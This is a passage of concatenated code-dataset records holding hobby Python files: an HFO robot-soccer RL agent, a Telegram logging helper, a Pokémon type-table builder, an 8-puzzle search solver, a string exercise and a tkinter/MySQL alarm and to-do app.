print(response.status_code)\n\n","repo_name":"AureliusAtilius/FeedbackPost","sub_path":"feedbackPost.py","file_name":"feedbackPost.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28155383977","text":"#!/usr/bin/env python3\n#encoding utf-8\n\nfrom hfo import *\nfrom copy import copy, deepcopy\nfrom DiscreteHFO.EnvironmentDynamics import Dynamics\nimport math\nimport random\nimport ast\n\nclass HFOAttackingPlayer(object):\n\tdef __init__(self, config_dir = '../../../bin/teams/base/config/formations-dt', agentId=0,\n\t\tport = 6000, server_addr = 'localhost', team_name = 'base_left', play_goalie = False,\n\t\tinitDiscCoordX = 0, initDiscCoordY = 0, numOpponents = 0, numTeammates = 0, \n\t\tcollisionPenalty = 0.4, dribbleAccuracy = 0.2, kickAccuracy = [[0.8] * 5] * 5,\n\t\tactionDurations = 40, initFileLoc = \"initCoordinates.txt\"):\n\n\t\tself.hfo = HFOEnvironment()\n\t\tself.config_dir = config_dir\n\t\tself.port = port\n\t\tself.server_addr = server_addr\n\t\tself.team_name = team_name\n\t\tself.play_goalie = play_goalie\n\t\tself.initDiscCoordY = initDiscCoordY\n\t\tself.initDiscCoordX = initDiscCoordX\n\t\tself.numTeammates = numTeammates\n\t\tself.numOpponents = numOpponents\n\t\tself.collisionPenalty = collisionPenalty\n\t\tself.curState = None\n\t\tself.dribbleAccuracy = dribbleAccuracy\n\t\tself.kickAccuracy = kickAccuracy\n\t\tself.possibleActions = ['DRIBBLE_UP', 'DRIBBLE_DOWN', 'DRIBBLE_LEFT', 'DRIBBLE_RIGHT', 'KICK']\n\t\tself.actionDurations = actionDurations\n\t\tself.initPositions = []\n\t\tself.oppoPositions = []\n\t\tself.agentId = agentId\n\t\tself.episode = 0\n\t\tself.initFileLoc = initFileLoc\n\t\tself.dynamics = Dynamics()\n\t\tself.readInitLocFinal()\n\n\n\t# Restarts episode by resetting the current state of the environment to the initial state.\n\tdef reset(self):\n\t\tself.curState = [(self.initPositions[self.episode][0],self.initPositions[self.episode][1])]\n\t\tfor oppoIndex in range(len(self.oppoPositions[self.episode])):\n\t\t\tself.curState.append((self.oppoPositions[self.episode][oppoIndex][0],self.oppoPositions[self.episode][oppoIndex][1]))\n\t\t\n\t\tself.initDiscCoordX = self.initPositions[self.episode][0]\n\t\tself.initDiscCoordY = self.initPositions[self.episode][1]\n\t\tself.initGame()\n\t\tself.episode += 1\n\n\t\treturn self.curState\t\t\n\n\t# Establish connection with HFO server\n\tdef 
connectToServer(self):\n\t\tself.hfo.connectToServer(HIGH_LEVEL_FEATURE_SET,self.config_dir,self.port,self.server_addr,self.team_name,self.play_goalie)\n\n\t# From a location feature given by HFO, output the discrete representation of that location\n\tdef getDiscretizedLocation(self, coordX, coordY):\n discCoordX = int(math.floor((coordX+(1.0/11.0))/0.34))\n discCoordY = int(math.floor((coordY)/0.275))\n\n return discCoordX, discCoordY\n\n\t# Based on gridworld coordinate, get the coordinates of the centroid of that\n\t# grid in the real HFO state representation.\n\n\tdef getCentroidCoord(self, discCoordX, discCoordY):\n centroidX = (-1.0/1.1) + discCoordX * 0.34 + 0.17\n centroidY = -0.825 + discCoordY * 0.275 + 0.1375\n\n return centroidX, centroidY\n\n\t# Method to move agent to it's initial position\n\n\tdef moveToInitLocs(self):\n\t\tdestinationX, destinationY = self.getCentroidCoord(self.initDiscCoordX, self.initDiscCoordY)\n\t\tself.hfo.act(DRIBBLE_TO, destinationX, destinationY)\n\t\tself.hfo.step()\n\t\t#completeState = self.hfo.getState()\n\t\t#self.curState = self.process_state(completeState)\n\n\t# Method updates the discrete state representation of the environment after\n\t# the agent does an action. Stochaticity of the environment is implemented here.\n\n\tdef act(self, actionString):\n\n\t\tresultingStatus = 0\n\t\tcounter = 0\n\t\tagentCurrentState = self.curState[0]\n\t\tactionString = self.dynamics.sampleDynamics(actionString, agentCurrentState)\n\t\tif actionString =='DRIBBLE_UP':\n\t\t\tnextDiscX = self.curState[0][0]\n\t\t\tnextDiscY = max(self.curState[0][1]-1,0)\n\n\n\t\telif actionString =='DRIBBLE_DOWN':\n\t\t\tnextDiscX = self.curState[0][0]\n\t\t\tnextDiscY = min(self.curState[0][1]+1,5)\n\n\n\t\telif actionString =='DRIBBLE_LEFT':\n\t\t\tnextDiscX = max(0,self.curState[0][0]-1)\n\t\t\tnextDiscY = self.curState[0][1]\n\n\t\telif actionString =='DRIBBLE_RIGHT':\n\t\t\tnextDiscX = min(4,self.curState[0][0]+1)\n\t\t\tnextDiscY = self.curState[0][1]\n\t\t\t\n\n\t\tif actionString != 'KICK' and actionString != 'KICK_WAYWARD':\n\t\t\tdestinationX, destinationY = self.getCentroidCoord(nextDiscX, nextDiscY)\n\n\t\t\tfor index in range(1, len(self.curState)):\n\t\t\t\tif (nextDiscX, nextDiscY) == self.curState[index]:\n\t\t\t\t\tdestinationX -= 0.05\n\t\t\t\t\tdestinationY -= 0.05\n\t\t\t\t\tbreak\n\t\t\tresultingStatus = self.visualizeDribbles(destinationX,destinationY)\t\t\n\t\t\tself.curState[0] = (nextDiscX, nextDiscY)\n\n\t\telse :\n\t\t\tkickSuccessFlag = False\n\t\t\tif actionString == 'KICK':\n\t\t\t\tkickSuccessFlag = True\n\t\t\t\tself.curState = \"GOAL\"\n\t\t\t\tresultingStatus = GOAL\n\t\t\telse:\n\t\t\t\tself.curState = \"OUT_OF_BOUNDS\"\n\t\t\t\tresultingStatus = OUT_OF_BOUNDS\n\n\t\t\tself.visualizeKicks(kickSuccessFlag)\n\n\n\n\t\treturn resultingStatus, self.curState\n\n\t# Visualizes the DRIBBLE_* actions taken by agent. 
Action is \n\t# completed only if the environment decides to stop the game\n\t# or if the action duration surpasses self.actionDurations iterations.\n\t# Returns the status after the dribble action is completed\n\n\tdef visualizeDribbles(self, destinationX, destinationY):\n\t\tresultingStatus =0\n\t\tcounter = 0\n\n\t\t# Action will run as long as the number of iterations where it's done is less than\n\t\t# self.actionDurations and the ball doesn't get out of the game board.\n\n\t\twhile counter < self.actionDurations and resultingStatus == 0:\n\t\t\tcurrentState = self.hfo.getState()\n\t\t\t# if agent does not have the ball agent must get closer to the ball\n\t\t\t# else, dribble to destinatination\n\n\t\t\tif currentState[5] != 1:\n\t\t\t\tself.hfo.act(GO_TO_BALL)\n\t\t\telse :\n\t\t\t\tself.hfo.act(DRIBBLE_TO, destinationX, destinationY)\n\t\t\tresultingStatus = self.hfo.step()\n\t\t\tcounter += 1\n\t\treturn resultingStatus\n\n\t# Visualizes the KICK action taken by agent. Action is \n\t# completed only if the ball gets out of the play, the episode finishes,\n\t# or a goal happened.\n\n\tdef visualizeKicks(self, kickSuccessFlag):\n\t\tresultingStatus = 0\n\t\t# If kick is successfully directed to goal\n\t\tif kickSuccessFlag:\n\t\t\tcurrentState = self.hfo.getState()\n\t\t\tstatus = 0\n\t\t\twhile status == 0:\n\n\t\t\t\t# Shoot the ball to the goal\n\t\t\t\tself.hfo.act(SHOOT)\n\t\t\t\tstatus = self.hfo.step()\n\t\t\t\tcurrentState = self.hfo.getState()\n\n\t\t\t\t# In case that the kick is too weak, agent must chase the ball\n\t\t\t\twhile currentState[5] != 1 and status == 0:\n\t\t\t\t\tself.hfo.act(GO_TO_BALL)\n\t\t\t\t\tstatus = self.hfo.step()\n\t\t\t\t\tcurrentState = self.hfo.getState()\n\n\t\t# If kick is wayward\n\t\telse:\n\t\t\tcurrentState = self.hfo.getState()\n\t\t\tstatus = 0\n\t\t\twhile status == 0:\n\n\t\t\t\t# Shoot the ball to a point close to the agent which isn't\n\t\t\t\t# the goal\n\t\t\t\tcurPosX, curPosY = currentState[0], currentState[1]\n\t\t\t\tif curPosX > 0 and curPosY > 0 :\n\t\t\t\t\tself.hfo.act(KICK_TO, 0.5, 1.0,3)\n\t\t\t\telif curPosX <= 0 and curPosY > 0 :\n\t\t\t\t\tself.hfo.act(KICK_TO, -0.5, 1.0,3)\n\t\t\t\telif curPosX > 0 and curPosY <= 0:\n\t\t\t\t\tself.hfo.act(KICK_TO, 1.0, -0.5,3)\n\t\t\t\telse:\n\t\t\t\t\tself.hfo.act(KICK_TO, -1.0, -0.5,3)\n\n\t\t\t\t# In case that the kick is too weak, agent must chase the ball\n\t\t\t\tstatus = self.hfo.step()\n\t\t\t\tcurrentState = self.hfo.getState()\n\t\t\t\twhile currentState[5] != 1 and status == 0:\n\t\t\t\t\tself.hfo.act(GO_TO_BALL)\n\t\t\t\t\tstatus = self.hfo.step()\n\t\t\t\t\tcurrentState = self.hfo.getState()\n\n\t\treturn resultingStatus\n\n\t# Defined reward for this environment\n\t# Add a -0.4 penalty if attacking agent occupies the same grid\n\t# as an attacking opponent. 
Also, give +1 for goal.\n\tdef get_reward(self, status, nextState):\n\t\ttotalReward = 0\n\t\tif status == GOAL:\n\t\t\ttotalReward += 1\n\n\t\tif nextState != \"GOAL\" and nextState != \"OUT_OF_BOUNDS\":\n\t\t\tfor index in range(1, len(nextState)):\n\t\t\t\tif nextState[0] == nextState[index]:\n\t\t\t\t\ttotalReward -= self.collisionPenalty\n\t\t\t\t\tbreak\n\n\t\treturn totalReward\n\t\t\n\n\t# Discretize the state representation given by the HFO environment.\n\t# Discretization is done to the locations of the ball and agents\n\tdef process_state(self, state):\n\t\tdiscretizedState = self.getDiscretizedLocation(state[0], state[1])\n\t\toffset = 10 + 6*self.numTeammates\n\n\t\tinfoList = [discretizedState]\n\t\tfor i in range(self.numOpponents):\n\t\t\toppoLocX = offset + 3*i\n\t\t\toppoLocY = offset + 3*i + 1\n\t\t\tinfoList.append(self.getDiscretizedLocation(state[oppoLocX],state[oppoLocY]))\n\t\treturn infoList\n\n\t# Method that serves as an interface between a script controlling the agent\n\t# and the environment. Method returns the nextState, reward, flag indicating\n\t# end of episode, and current status of the episode\n\n\tdef step(self, action_params):\n\t\tstatus, nextState = self.act(action_params)\n\t\tdone = (status!=IN_GAME)\n\t\treward = self.get_reward(status, nextState)\n\t\treturn self.curState, reward, done, status\n\n\t\t\n\tdef waste_one_episode(self):\n\t\tstatus = IN_GAME\n\t\twhile status == IN_GAME:\n\t\t\tself.hfo.act(DASH, 0, 0)\n\t\t\tstatus = self.hfo.step()\n\n\tdef waste_one_step(self):\n\t\tself.hfo.act(DASH, 0, 0)\n\t\tself.hfo.step()\n\n\tdef quitGame(self):\n\t\tself.hfo.act(QUIT)\n\n\t# For the first 150 iterations, reposition agents\n\t# to initial position\n\tdef initGame(self):\n\t\tframeCounters = 0\n\t\twhile frameCounters < 150:\n\t\t\tself.moveToInitLocs()\n\t\t\tframeCounters += 1\n\n\tdef readInitLocFinal(self):\n\t\tfilename = self.initFileLoc\n\t\tfile = open(filename, \"r\")\n\n\t\tself.initPositions = []\n\n\t\tfor line in file:\n\t\t\tepisodeOpponents = []\n\t\t\tlistPos = ast.literal_eval(line)\n\t\t\tfor index in range(self.numOpponents+1):\n\t\t\t\tif index == self.agentId:\n\t\t\t\t\tself.initPositions.append(listPos[index])\n\t\t\t\telse:\n\t\t\t\t\tepisodeOpponents.append(listPos[index])\n\t\t\tself.oppoPositions.append(episodeOpponents)\n\n\n\n\n\n\n\n\n","repo_name":"raharrasy/RL2019-BaseCodes","sub_path":"Exercise2/DiscreteHFO/HFOAttackingPlayer.py","file_name":"HFOAttackingPlayer.py","file_ext":"py","file_size_in_byte":9482,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"8649672247","text":"import datetime\nimport configuration\nimport telebot\n\nbot = telebot.TeleBot(configuration.token)\nnow = datetime.datetime.now()\n\ndef log(text, user_id, disco_id):\n print(\"------------------------------\")\n ndt = now.strftime(\"%d-%m-%Y %H:%M\")\n main_string = ndt + \"\\n\" + 'result: ' + text + \"\\n\"\n second_string = f\"telegram id: {user_id}, disco id: {disco_id}\"\n ready_string = main_string + second_string\n print(ready_string)\n print(\"------------------------------\")\n bot.send_message(321965003, ready_string)\n\n# log(\"123\", \"@keguser0\", \"321965003\", \"1645\")","repo_name":"heycarl/DiscoBot","sub_path":"log_functions.py","file_name":"log_functions.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40463898622","text":"import json\nfile_name = 
'E:\\\\github\\\\NoneBot\\\\qbot\\\\src\\\\plugins\\\\pokemon\\\\table.txt'\nwith open(file_name, encoding='utf-8') as f:\n file_content = f.read()\n f.close()\ntable = file_content.split('\\n')\nfile_name = 'E:\\\\github\\\\NoneBot\\\\qbot\\\\datebase\\\\pokemon\\\\types.json'\nwith open(file_name, encoding='utf-8') as f:\n file_content = f.read()\n f.close()\ntypes_json = json.loads(file_content)\nfor i in range(18):\n effect_list = table[i].split('\\t')\n types_json[i]['effect_double'] = []\n types_json[i]['effect_half'] = []\n types_json[i]['effect_zero'] = []\n for j in range(18):\n if effect_list[j] == '2×':\n types_json[i]['effect_double'].append(types_json[j]['english'])\n if effect_list[j] == '1⁄2×':\n types_json[i]['effect_half'].append(types_json[j]['english'])\n if effect_list[j] == '0×':\n types_json[i]['effect_zero'].append(types_json[j]['english'])\n\nfile_name = 'E:\\\\github\\\\NoneBot\\\\qbot\\\\datebase\\\\pokemon\\\\types_with_effect.json'\nwith open(file_name, 'w', encoding='utf-8') as f:\n s = json.dumps(types_json, ensure_ascii=False)\n f.write(s)\nf.close()\n","repo_name":"NekoMashiro/water_spinach_bot","sub_path":"src/plugins/pokemon_model/create_effect_table.py","file_name":"create_effect_table.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28788255025","text":"from queue import Queue, LifoQueue, PriorityQueue\nfrom heap_util import decrease_key\nfrom state import State\n\n\ndef solve(matrix, algorithm, prioritized=False, heuristic=None):\n # if prioritized and heuristic = None:\n # raise Exception('Error: cannot execute without heuristic!')\n # if not prioritized and heuristic is not None:\n # heuristic=None # ignore heuristic\n \n search_depth = 0 # stores the maximum depth reached by the applied algorithm\n \n frontier_list = frontier(algorithm)\n frontier_set = set() # for later search\n explored = set()\n start_state = State(matrix, heuristic=heuristic)\n if start_state.is_solvable():\n frontier_list.put(start_state)\n frontier_set.add(start_state)\n while not frontier_list.empty():\n current_state = frontier_list.get()\n frontier_set.remove(current_state)\n explored.add(current_state)\n \n search_depth = max(search_depth, current_state.cost)\n \n if current_state.is_goal_state():\n path = get_path(current_state)\n return path, cost(path), explored, search_depth\n next_states = current_state.generate_moves()\n for state in next_states:\n if state not in explored and state not in frontier_set:\n frontier_list.put(state)\n frontier_set.add(state)\n elif prioritized:\n if state in frontier_set:\n if decrease_key(frontier_list.queue, 0, frontier_list.queue.index(state), state):\n frontier_set.remove(state)\n frontier_set.add(state)\n else:\n path = LifoQueue()\n path.put(start_state)\n return path, cost(path), explored, search_depth\n\n'''\nCLEAN\n'''\n# specify container according to search algorithm\n\n\ndef frontier(algorithm):\n if algorithm == 'bfs':\n return Queue()\n elif algorithm == 'dfs':\n return LifoQueue()\n elif algorithm == 'a_star':\n return PriorityQueue()\n\n# retrieve path till the goal\n\n\ndef get_path(current_state):\n path = LifoQueue()\n path.put(current_state)\n while current_state.parent is not None:\n path.put(current_state.parent)\n current_state = current_state.parent\n return path\n\n# calculate the path cost\n\n\ndef cost(path):\n return len(path.queue) - 
1\n\n\n\n","repo_name":"SalmaAwad/8-Puzzle-Game","sub_path":"puzzle_solver.py","file_name":"puzzle_solver.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32419588251","text":"# Write a Python program to change a given string to a new string where the first and last chars have been exchanged \n\n## Solution\n\nstring = \"manzoor\"\nstring_list = []\n\nfor cha in string: ## Convert string to list\n string_list.append(cha)\nstring_list[0], string_list[-1] = string_list[-1], string_list[0]\n\nstring = \"\"\nfor cha in string_list:\n string+=cha\nprint(string)\n\n## Solution 2\ndef change_sring(str1):\n return str1[-1:] + str1[1:-1] + str1[:1]\n \nprint(change_sring('abcd'))\nprint(change_sring('12345'))","repo_name":"ManzoorAhamed/python-200-problems","sub_path":"27-character-exchange/character-exchange.py","file_name":"character-exchange.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17468041011","text":"from tkinter import *\r\nfrom tkinter.messagebox import *\r\nfrom PIL import Image\r\nimport time\r\nimport winsound\r\nimport mysql.connector\r\nfrom tkinter import messagebox\r\nfrom datetime import datetime\r\n\r\nglobal c1\r\nglobal c2\r\nglobal c3\r\nglobal c4\r\nglobal c5\r\nglobal c6\r\nglobal secs_counter\r\nglobal mins_counter\r\nglobal hours_counter\r\nsecs_counter = 0\r\nmins_counter = 0\r\nhours_counter = 0\r\n\r\nmydb = mysql.connector.connect(\r\nhost = \"localhost\",\r\nuser = \"root\",\r\npassword = \"root\"\r\n)\r\nmy_cur = mydb.cursor()\r\nmy_cur.execute(\"Create database if not exists utility\")\r\nmy_cur.execute(\"use utility\")\r\nmy_cur.execute(\"Create table if not exists todo(note char(255))\")\r\nmy_cur.execute(\"Create table if not exists alarm(hr integer(11) , min integer(11))\")\r\nmydb.commit()\r\n####################################################################################################################################################################################\r\ndef alarm():\r\n def back11():\r\n alarm_frame.destroy()\r\n userText = False\r\n def userText1(event):\r\n alarm_entry_hr.delete(0 , END)\r\n usercheck = TRUE\r\n def userText2(event):\r\n alarm_entry_min.delete(0 , END)\r\n usercheck = TRUE\r\n def add_alarm(hr , min , alarm_frame):\r\n def alar(): \r\n freq = 1000\r\n dur = 500\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n my_cur.execute(\"Select * from alarm\")\r\n a1 = my_cur.fetchall()\r\n for i in a1:\r\n if(i[0] == datetime.now().hour and i[1] == datetime.now().minute):\r\n hr1 = str(i[0])\r\n min1 = str(i[1])\r\n for j in range(0, 4): \r\n winsound.Beep(freq, dur)\r\n my_cur.execute(\"Delete from alarm where hr = %s and min = %s \" %(hr1 , min1))\r\n mydb.commit()\r\n alarm_frame.destroy()\r\n \r\n time.sleep(1)\r\n alar()\r\n try:\r\n hr = int(hr)\r\n min = int(min)\r\n if(hr>24 or hr<0 or min>60 or min<0):\r\n messagebox.showwarning(\"Alert\" , \"Enter a valid time\")\r\n return\r\n my_cur.execute(\"Insert into alarm (hr , min) values ('%s' ,'%s')\" %(hr , min))\r\n mydb.commit()\r\n alar()\r\n\r\n except ValueError:\r\n messagebox.showwarning(\"ALert\" , \"Dont leave a field blank\")\r\n \r\n alarm_frame = Frame(c, bg = \"cyan\")\r\n alarm_frame.place(relx = 0, rely = 0.1 , relwidth = 1, relheight = 0.9)\r\n\r\n eg_label = Label(alarm_frame , text = \"Enter in 24 hr format eg.(23hr 
20min)\")\r\n eg_label.pack()\r\n\r\n alarm_entry_hr = Entry(alarm_frame)\r\n alarm_entry_hr.insert(0 , \"Enter hr here\")\r\n alarm_entry_hr.bind(\"